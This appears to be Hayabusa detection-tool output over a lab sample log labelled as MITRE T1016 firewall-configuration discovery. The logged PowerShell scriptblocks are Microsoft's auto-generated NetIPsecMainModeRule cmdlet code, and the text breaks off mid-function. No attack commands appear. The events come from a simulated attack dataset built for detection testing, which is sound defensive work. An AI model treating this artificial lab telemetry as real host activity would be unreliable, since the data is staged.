[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' function 
Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociat",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"edNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
